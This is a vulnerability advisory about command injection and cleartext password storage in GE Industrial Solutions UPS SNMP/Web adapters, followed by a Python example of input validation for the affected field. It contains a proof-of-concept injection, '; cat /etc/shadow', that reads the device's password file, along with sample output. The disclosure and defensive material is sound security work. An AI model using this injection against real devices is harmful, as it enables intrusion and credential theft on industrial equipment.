GE Industrial Solutions UPS SNMP Adapter Command Injection

2016.02.04
Credit: Karn Ganeshen
Risk: High
Local: No
Remote: Yes
CWE: CWE-78

GE Industrial Solutions - UPS SNMP Adapter Command Injection and Clear-text Storage of Sensitive Information Vulnerabilities

*Timelines:*
Reported to ICS-CERT on: July 06, 2015
Fix & Advisory Released by GE: January 25, 2015
Vulnerability ID: GEIS16-01

*GE Advisory:*
http://apps.geindustrial.com/publibrary/checkout/GEIS_SNMP?TNR=Application%20and%20Technical|GEIS_SNMP|PDF&filename=GEIS_SNMP.pdf

*ICS-CERT Advisory:* In Progress

*About GE*
GE is a US-based company that maintains offices in several countries around the world. The affected product, SNMP/Web Interface adapter, is a web server designed to present information about the Uninterruptible Power Supply (UPS). According to GE, the SNMP/Web Interface is deployed across several sectors including Critical Manufacturing and Energy. GE estimates that these products are used worldwide.

*Affected Products*
- All SNMP/Web Interface cards with firmware version prior to 4.8 manufactured by GE Industrial Solutions.

*CVE-IDs:*
CVE-2016-0861
CVE-2016-0862

*VULNERABILITY OVERVIEW*

A. *COMMAND INJECTION CVE-2016-0861*

Device application services run as a privileged (root) user and do not perform strict input validation. This allows an authenticated user to execute any system command on the system.

Vulnerable function: http://IP/dig.asp
Vulnerable parameter: Hostname/IP address

*PoC:*
In the Hostname/IP address input, enter:

    ; cat /etc/shadow

Output:

    root:<hash>:0:0:root:/root:/bin/sh
    <...other system users...>
    ge:<hash>:101:0:gedeups7:/home/admin:/bin/sh
    root123:<hash>:102:0:gedeups2:/home/admin:/bin/sh

B. *CLEARTEXT STORAGE OF SENSITIVE INFORMATION CVE-2016-0862*

A file contains sensitive account information stored in cleartext. All users, including non-admins, can view/access the device's configuration via Menu option -> Save -> Settings.

The application stores all information in clear-text, including *all user logins and clear-text passwords*.

+++++

I sent it out on Jan 29 but for some reason, it was not posted to FD. So sending it again.

--
Best Regards,
Karn Ganeshen
ipositivesecurity.blogspot.in
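One way to apply the strict input validation that the dig.asp Hostname/IP address field lacks, as an added example (not GE's firmware code and not part of the original advisory). The function names and the `dig +short` invocation are assumptions, since the advisory does not say how the adapter performs the lookup; the sample inputs are constructed, apart from the PoC string quoted above.

```python
import ipaddress
import re
import subprocess

# Allowlist of characters that can appear in a hostname or IP literal.
_ALLOWED = re.compile(r"[A-Za-z0-9.:-]{1,253}")
# RFC 1123 label: alphanumeric at both ends, hyphens inside, 1-63 chars.
_LABEL = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?")


def validate_target(value):
    """Return a canonical hostname or IP address, or raise ValueError."""
    if not isinstance(value, str) or not _ALLOWED.fullmatch(value):
        raise ValueError("target has characters outside [A-Za-z0-9.:-]")
    try:
        return str(ipaddress.ip_address(value))  # IPv4 or IPv6 literal
    except ValueError:
        pass  # not an IP literal; fall through to the hostname rules
    name = value[:-1] if value.endswith(".") else value
    labels = name.split(".")
    if not all(_LABEL.fullmatch(label) for label in labels):
        raise ValueError("not a valid hostname or IP address")
    if labels[-1].isdigit():
        raise ValueError("all-numeric last label: malformed IP address")
    return name.lower()


def build_lookup_argv(value):
    # The validated value is a single argv element; no shell parses it.
    return ["dig", "+short", validate_target(value)]


def run_lookup(value, timeout=5.0):
    """Hypothetical handler body: argv list, shell=False (the default)."""
    done = subprocess.run(build_lookup_argv(value), capture_output=True,
                          text=True, timeout=timeout, check=False)
    return done.stdout


if __name__ == "__main__":
    # Constructed inputs; the second is the string from the PoC above.
    for candidate in ["ups01.example.com", "; cat /etc/shadow", "192.0.2.10",
                      "$(id)", "-v", "@198.51.100.1", "fe80::1%eth0"]:
        try:
            print(repr(candidate), "->", build_lookup_argv(candidate))
        except ValueError as err:
            print(repr(candidate), "-> rejected:", err)
```

Validation and shell-free invocation are independent layers: either one alone stops the `;` separator from reaching a shell, and running the web service as a non-root user limits the impact if both fail.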

